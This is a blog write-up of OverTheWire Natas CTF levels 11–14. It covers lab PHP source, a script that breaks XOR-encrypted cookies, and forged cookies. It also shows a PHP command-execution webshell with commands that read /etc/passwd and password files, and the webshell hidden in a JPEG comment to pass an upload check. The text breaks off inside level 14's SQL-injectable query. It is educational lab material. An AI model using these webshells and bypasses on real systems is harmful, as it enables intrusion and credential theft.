<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="OverTheWire: NATAS 11 – 15" /><meta property="og:locale" content="en" /><meta name="description" content="LEVEL 11" /><meta property="og:description" content="LEVEL 11" /><link rel="canonical" href="https://megawattsec.com/posts/overthewire-natas-11/" /><meta property="og:url" content="https://megawattsec.com/posts/overthewire-natas-11/" /><meta property="og:site_name" content="MegaWattSec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2019-09-12T12:03:00-04:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="OverTheWire: NATAS 11 – 15" /><meta name="twitter:site" content="@megawattsec" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2019-09-12T12:03:00-04:00","datePublished":"2019-09-12T12:03:00-04:00","description":"LEVEL 11","headline":"OverTheWire: NATAS 11 – 15","mainEntityOfPage":{"@type":"WebPage","@id":"https://megawattsec.com/posts/overthewire-natas-11/"},"url":"https://megawattsec.com/posts/overthewire-natas-11/"}</script><title>OverTheWire: NATAS 11 &#8211; 15 | MegaWattSec</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="MegaWattSec"><meta name="application-name" content="MegaWattSec"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src=" /assets/img/jamack_close.jpg " alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">MegaWattSec</a></div><div class="site-subtitle font-italic">Adventures of a Forever-Newb</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/megawattsec" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/megawattsec" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['megawattsec','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>OverTheWire: NATAS 11 &#8211; 15</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>OverTheWire: NATAS 11 &#8211; 15</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/megawattsec">Dustin</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" data-ts="1568304180" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2019-09-12 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1765 words"> <em>9 min</em> read</span></div></div></div><div class="post-content"><h3 id="level-11"><span class="mr-2">LEVEL 11</span><a href="#level-11" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-221" data-src="/assets/img/2019/09/2019-09-11_13h57_52.png" data-proofer-ignore></p><p>PHP sourcecode:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>
<span class="nv">$defaultdata</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span> <span class="s2">"showpassword"</span><span class="o">=&gt;</span><span class="s2">"no"</span><span class="p">,</span> <span class="s2">"bgcolor"</span><span class="o">=&gt;</span><span class="s2">"#ffffff"</span><span class="p">);</span>

<span class="k">function</span> <span class="n">xor_encrypt</span><span class="p">(</span><span class="nv">$in</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$key</span> <span class="o">=</span> <span class="s1">'&lt;censored&gt;'</span><span class="p">;</span>
    <span class="nv">$text</span> <span class="o">=</span> <span class="nv">$in</span><span class="p">;</span>
    <span class="nv">$outText</span> <span class="o">=</span> <span class="s1">''</span><span class="p">;</span>

    <span class="c1">// Iterate through each character</span>
    <span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$text</span><span class="p">);</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$outText</span> <span class="mf">.</span><span class="o">=</span> <span class="nv">$text</span><span class="p">[</span><span class="nv">$i</span><span class="p">]</span> <span class="o">^</span> <span class="nv">$key</span><span class="p">[</span><span class="nv">$i</span> <span class="o">%</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$key</span><span class="p">)];</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="nv">$outText</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">loadData</span><span class="p">(</span><span class="nv">$def</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">global</span> <span class="nv">$_COOKIE</span><span class="p">;</span>
    <span class="nv">$mydata</span> <span class="o">=</span> <span class="nv">$def</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"data"</span><span class="p">,</span> <span class="nv">$_COOKIE</span><span class="p">))</span> <span class="p">{</span>
    <span class="nv">$tempdata</span> <span class="o">=</span> <span class="nb">json_decode</span><span class="p">(</span><span class="nf">xor_encrypt</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"data"</span><span class="p">])),</span> <span class="kc">true</span><span class="p">);</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">is_array</span><span class="p">(</span><span class="nv">$tempdata</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"showpassword"</span><span class="p">,</span> <span class="nv">$tempdata</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"bgcolor"</span><span class="p">,</span> <span class="nv">$tempdata</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s1">'/^#(?:[a-f\d]{6})$/i'</span><span class="p">,</span> <span class="nv">$tempdata</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="nv">$mydata</span><span class="p">[</span><span class="s1">'showpassword'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$tempdata</span><span class="p">[</span><span class="s1">'showpassword'</span><span class="p">];</span>
        <span class="nv">$mydata</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$tempdata</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">];</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="nv">$mydata</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">saveData</span><span class="p">(</span><span class="nv">$d</span><span class="p">)</span> <span class="p">{</span>
    <span class="nb">setcookie</span><span class="p">(</span><span class="s2">"data"</span><span class="p">,</span> <span class="nb">base64_encode</span><span class="p">(</span><span class="nf">xor_encrypt</span><span class="p">(</span><span class="nb">json_encode</span><span class="p">(</span><span class="nv">$d</span><span class="p">))));</span>
<span class="p">}</span>

<span class="nv">$data</span> <span class="o">=</span> <span class="nf">loadData</span><span class="p">(</span><span class="nv">$defaultdata</span><span class="p">);</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"bgcolor"</span><span class="p">,</span><span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nb">preg_match</span><span class="p">(</span><span class="s1">'/^#(?:[a-f\d]{6})$/i'</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]))</span> <span class="p">{</span>
        <span class="nv">$data</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">];</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="nf">saveData</span><span class="p">(</span><span class="nv">$data</span><span class="p">);</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;h1&gt;</span>natas11<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>
<span class="nt">&lt;body</span> <span class="na">style=</span><span class="s">"background: </span><span class="cp">&lt;?=</span><span class="nv">$data</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]</span><span class="cp">?&gt;</span><span class="s">;"</span><span class="nt">&gt;</span>
Cookies are protected with XOR encryption<span class="nt">&lt;br/&gt;&lt;br/&gt;</span>

<span class="cp">&lt;?</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$data</span><span class="p">[</span><span class="s2">"showpassword"</span><span class="p">]</span> <span class="o">==</span> <span class="s2">"yes"</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">print</span> <span class="s2">"The password for natas12 is &lt;censored&gt;&lt;br&gt;"</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;form&gt;</span>
Background color: <span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">bgcolor</span> <span class="na">value=</span><span class="s">"</span><span class="cp">&lt;?=</span><span class="nv">$data</span><span class="p">[</span><span class="s1">'bgcolor'</span><span class="p">]</span><span class="cp">?&gt;</span><span class="s">"</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">submit</span> <span class="na">value=</span><span class="s">"Set color"</span><span class="nt">&gt;</span>
<span class="nt">&lt;/form&gt;</span></code></pre></figure><h4 id="attempt-1"><span class="mr-2">Attempt 1.</span><a href="#attempt-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>Since there’s an input box here that can set the “bgcolor” variable, we probably have to use that somehow to inject the values we want.</p><p>Maybe we can break the JSON with a quotation character and inject another “showpassword” value. Typing it into the form field should look like <span class="lang:php highlight:0 decode:true crayon-inline">“,”showpassword”:”yes”</span> .</p><p>However, that didn’t work, thanks to the character filter <code class="language-plaintext highlighter-rouge">preg_match(‘/^#(?:[a-f\d]{6})$/i’, $_REQUEST[‘bgcolor’])</code> . Back to the drawing board…</p><h4 id="attempt-2"><span class="mr-2">Attempt 2</span><a href="#attempt-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>The bottom part of the sourcecode suggests that if we get the $data (which is a JSON array saved in a cookie) variable “showpassword” to be “yes”, then we will get the next password. And the line <code class="language-plaintext highlighter-rouge">$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[“data”])), true);</code> shows that our cookie is json encoded, then xor_encrypted, then base64 encoded.</p><p>To inject the “showpassword” value, we will need to recreate all these things and save it in the “data” cookie.</p><p>The JSON format for the values needed is:</p><p><code class="language-plaintext highlighter-rouge">{“showpassword”:”yes”,”bgcolor”:”#ffffff”}</code></p><p>For the XOR encryption, I did a quick Google search and found a <a href="http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/">python script</a> I can use for this. I modified it a little to work with arguments passed to it instead of hardcoded values.</p><p>When putting it all together with the <strong>current level’s password </strong>as the XOR key, it did NOTHING when I set that as the cookie. So that’s not the key, we need to figure out what it is.</p><p>XOR isn’t a particularly good method of encryption, and very vulnerable to a known plaintext attack. We can probably get the key out since we know what data should decrypt to: <code class="language-plaintext highlighter-rouge">{“showpassword”:”no”,”bgcolor”:”#ffffff”}</code></p><p>The cookie data value is “ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=” , so we would just XOR that with the JSON code above and hopefully get a good result.</p><p>The code I used for the decryption is (based on <a href="https://gist.github.com/revolunet/2412240">this script</a>):</p><figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/python
# NB : this is not secure
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
# added base64 encoding for simple querystring :)
#
</span><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">base64</span>
<span class="kn">from</span> <span class="nn">itertools</span> <span class="kn">import</span> <span class="n">izip</span><span class="p">,</span> <span class="n">cycle</span>

<span class="k">def</span> <span class="nf">xor_crypt_string</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">key</span><span class="o">=</span><span class="s">'awesomepassword'</span><span class="p">,</span> <span class="n">encode</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">decode</span><span class="o">=</span><span class="bp">True</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">decode</span><span class="p">:</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">decodestring</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">xored</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="o">^</span> <span class="nb">ord</span><span class="p">(</span><span class="n">y</span><span class="p">))</span> <span class="k">for</span> <span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)</span> <span class="ow">in</span> <span class="n">izip</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">cycle</span><span class="p">(</span><span class="n">key</span><span class="p">)))</span>
    <span class="k">if</span> <span class="n">encode</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">base64</span><span class="p">.</span><span class="n">encodestring</span><span class="p">(</span><span class="n">xored</span><span class="p">).</span><span class="n">strip</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">xored</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
	<span class="n">result</span> <span class="o">=</span> <span class="n">xor_crypt_string</span><span class="p">(</span><span class="s">'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw='</span><span class="p">,</span> <span class="s">'{"showpassword":"no","bgcolor":"#ffffff"}'</span><span class="p">,</span> <span class="bp">False</span><span class="p">,</span> <span class="bp">True</span><span class="p">)</span>
	<span class="k">print</span><span class="p">(</span><span class="n">result</span><span class="p">)</span></code></pre></figure><p>The output is “qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq” which is clearly a good result! That means the key is “qw8J”! Now that we have the key, it can be used to make a new cookie with the values we want.</p><p>String to encrypt should be: <code class="language-plaintext highlighter-rouge">{“showpassword”:”yes”,”bgcolor”:”#ffffff”}</code>, with the key “qw8J”. Change the script above to use these values and presto!</p><p>“ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK” is the output, just put that in the cookie with Burp and you’ll have the password!</p><p> </p><h3 id="level-12"><span class="mr-2">LEVEL 12</span><a href="#level-12" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-223" data-src="/assets/img/2019/09/2019-09-12_11h53_28.png" data-proofer-ignore></p><p>Sourcecode PHP:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>
<span class="k">function</span> <span class="n">genRandomString</span><span class="p">()</span> <span class="p">{</span>
  <span class="nv">$length</span> <span class="o">=</span> <span class="mi">10</span><span class="p">;</span>
  <span class="nv">$characters</span> <span class="o">=</span> <span class="s2">"0123456789abcdefghijklmnopqrstuvwxyz"</span><span class="p">;</span>
  <span class="nv">$string</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>  

  <span class="k">for</span> <span class="p">(</span><span class="nv">$p</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$p</span> <span class="o">&lt;</span> <span class="nv">$length</span><span class="p">;</span> <span class="nv">$p</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="nv">$string</span> <span class="mf">.</span><span class="o">=</span> <span class="nv">$characters</span><span class="p">[</span><span class="nb">mt_rand</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">strlen</span><span class="p">(</span><span class="nv">$characters</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)];</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="nv">$string</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">makeRandomPath</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span> <span class="nv">$ext</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">do</span> <span class="p">{</span>
  <span class="nv">$path</span> <span class="o">=</span> <span class="nv">$dir</span><span class="mf">.</span><span class="s2">"/"</span><span class="mf">.</span><span class="nf">genRandomString</span><span class="p">()</span><span class="mf">.</span><span class="s2">"."</span><span class="mf">.</span><span class="nv">$ext</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">while</span><span class="p">(</span><span class="nb">file_exists</span><span class="p">(</span><span class="nv">$path</span><span class="p">));</span>
  <span class="k">return</span> <span class="nv">$path</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">function</span> <span class="n">makeRandomPathFromFilename</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span> <span class="nv">$fn</span><span class="p">)</span> <span class="p">{</span>
  <span class="nv">$ext</span> <span class="o">=</span> <span class="nb">pathinfo</span><span class="p">(</span><span class="nv">$fn</span><span class="p">,</span> <span class="no">PATHINFO_EXTENSION</span><span class="p">);</span>
  <span class="k">return</span> <span class="nf">makeRandomPath</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span> <span class="nv">$ext</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"filename"</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">))</span> <span class="p">{</span>
  <span class="nv">$target_path</span> <span class="o">=</span> <span class="nf">makeRandomPathFromFilename</span><span class="p">(</span><span class="s2">"upload"</span><span class="p">,</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s2">"filename"</span><span class="p">]);</span>


  <span class="k">if</span><span class="p">(</span><span class="nb">filesize</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'uploadedfile'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">])</span> <span class="o">&gt;</span> <span class="mi">1000</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"File is too big"</span><span class="p">;</span>
  <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="nb">move_uploaded_file</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'uploadedfile'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">],</span> <span class="nv">$target_path</span><span class="p">))</span> <span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"The file &lt;a href=</span><span class="se">\"</span><span class="nv">$target_path</span><span class="se">\"</span><span class="s2">&gt;</span><span class="nv">$target_path</span><span class="s2">&lt;/a&gt; has been uploaded"</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span><span class="p">{</span>
      <span class="k">echo</span> <span class="s2">"There was an error uploading the file, please try again!"</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="cp">?&gt;</span>

<span class="nt">&lt;form</span> <span class="na">enctype=</span><span class="s">"multipart/form-data"</span> <span class="na">action=</span><span class="s">"index.php"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"MAX_FILE_SIZE"</span> <span class="na">value=</span><span class="s">"1000"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"filename"</span> <span class="na">value=</span><span class="s">"</span><span class="cp">&lt;?</span> <span class="k">print</span> <span class="nf">genRandomString</span><span class="p">();</span> <span class="cp">?&gt;</span><span class="s">.jpg"</span> <span class="nt">/&gt;</span>
Choose a JPEG to upload (max 1KB):<span class="nt">&lt;br/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">name=</span><span class="s">"uploadedfile"</span> <span class="na">type=</span><span class="s">"file"</span> <span class="nt">/&gt;&lt;br</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Upload File"</span> <span class="nt">/&gt;</span>
<span class="nt">&lt;/form&gt;</span>
<span class="cp">&lt;?</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure><h4 id="attempt-1-1"><span class="mr-2">Attempt 1</span><a href="#attempt-1-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>This level has a file upload, so there’s a couple of probable ways this could be vulnerable. It could be possible to upload a PHP webshell depending on what it does with the file after it’s uploaded. Or it could be vulnerable to directory traversal in the filename. On looking into the sourcecode, it kind of looks like it will be a vulnerability with the filename. It looks like part of the filename will be randomized, but the extension will be preserved.</p><p>I made a very small JPEG file since the max is only 1KB, and first tested it on the site to make sure it would go through.</p><p><img class="alignnone size-full wp-image-230" data-src="/assets/img/2019/09/2019-09-13_09h18_19.png" data-proofer-ignore></p><p>So it does randomize the name but preserve the extension. If I put in “/../” into the extension, maybe I can go up a directory. My system gave me a warning that files can’t be named with “/” in it, so maybe I can use URL encoding to get around that. I am able to save a filename that way, but the page doesn’t care, it replaces my filename completely and appends a “.jpg” as the extension with <code class="language-plaintext highlighter-rouge">&lt;input type=”hidden” name=”filename” value=”.jpg” /&gt;</code>.</p><h4 id="attempt-2-1"><span class="mr-2">Attempt 2</span><a href="#attempt-2-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4></h4><p>Instead of directly using the filename, we can use Burp to send it whatever we want in the form. Some experimentation shows that it does preserve the extension when put into the form with Burp.</p><p><img class="alignnone wp-image-234 size-full" data-src="/assets/img/2019/09/2019-09-13_09h38_21-1.png" data-proofer-ignore></p><p>I confirmed the vulnerability does allow me to load a PHP file. Since a link to the file is returned, it’s almost certain to allow me to use a webshell.</p><p>Here is the webshell I used:</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="c">&lt;!-- Simple PHP backdoor by DK (http://michaeldaw.org) --&gt;</span>
<span class="cp">&lt;?php</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">])){</span>
        <span class="k">echo</span> <span class="s2">"&lt;pre&gt;"</span><span class="p">;</span>
        <span class="nv">$cmd</span> <span class="o">=</span> <span class="p">(</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'cmd'</span><span class="p">]);</span>
        <span class="nb">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">);</span>
        <span class="k">echo</span> <span class="s2">"&lt;/pre&gt;"</span><span class="p">;</span>
        <span class="k">die</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">?&gt;</span>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<span class="c">&lt;!--    http://michaeldaw.org   2006    --&gt;</span></code></pre></figure><p>And this command gave the password: <code class="language-plaintext highlighter-rouge">http://natas12.natas.labs.overthewire.org/upload/2hqri8g7u3.php?cmd=cat+/etc/natas_webpass/natas13</code></p><p> </p><h3 id="level-13"><span class="mr-2">LEVEL 13</span><a href="#level-13" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-235" data-src="/assets/img/2019/09/2019-09-13_10h09_37.png" data-proofer-ignore></p><p>Uploading the same PHP file as last time gives an error:</p><p><img class="alignnone size-full wp-image-236" data-src="/assets/img/2019/09/2019-09-13_10h10_15.png" data-proofer-ignore></p><p>So there’s a check on the file contents itself. We can probably add just the “magic bytes” at the beginning of the file to make it look like a JPEG. Or hide PHP code within the EXIF data of a legitimate JPEG file.</p><p>Using some tools on my Kali box, I wrote the PHP webshell into the comment section of a JPEG file:</p><p><code class="language-plaintext highlighter-rouge">wrjpgcom -cfile phpupload upload.jpg &gt; test.jpg</code></p><p>After I uploaded it with the form, I used Burp to modify the form submission to change the extension (like the last level) to php. The results:</p><p><img class="alignnone size-full wp-image-237" data-src="/assets/img/2019/09/2019-09-13_10h36_40.png" data-proofer-ignore></p><p> </p><h3 id="level-14"><span class="mr-2">LEVEL 14</span><a href="#level-14" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3></h3><p><img class="alignnone size-full wp-image-238" data-src="/assets/img/2019/09/2019-09-13_10h49_40.png" data-proofer-ignore></p><p>This level is a common user authentication form. Let’s see the sourcecode.</p><figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span>
<span class="k">if</span><span class="p">(</span><span class="nb">array_key_exists</span><span class="p">(</span><span class="s2">"username"</span><span class="p">,</span> <span class="nv">$_REQUEST</span><span class="p">))</span> <span class="p">{</span>
  <span class="nv">$link</span> <span class="o">=</span> <span class="nb">mysql_connect</span><span class="p">(</span><span class="s1">'localhost'</span><span class="p">,</span> <span class="s1">'natas14'</span><span class="p">,</span> <span class="s1">'&lt;censored&gt;'</span><span class="p">);</span>
  <span class="nb">mysql_select_db</span><span class="p">(</span><span class="s1">'natas14'</span><span class="p">,</span> <span class="nv">$link</span><span class="p">);</span>
  
  <span class="nv">$query</span> <span class="o">=</span> <span class="s2">"SELECT * from users where username=</span><span class="se">\"</span><span class="s2">"</span><span class="mf">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"</span><span class="se">\"</span><span class="s2"> and password=</span><span class="se">\"</span><span class="s2">"</span><span class="mf">.</span><span class="nv">$_REQUEST</span><span class="p">[</span><span class="s2">"password"</span><span class="p">]</span><span class="mf">.</span><span class="s2">"</span><span class="se">\"</span><span class="s2">"</span><span class="p">;</span>
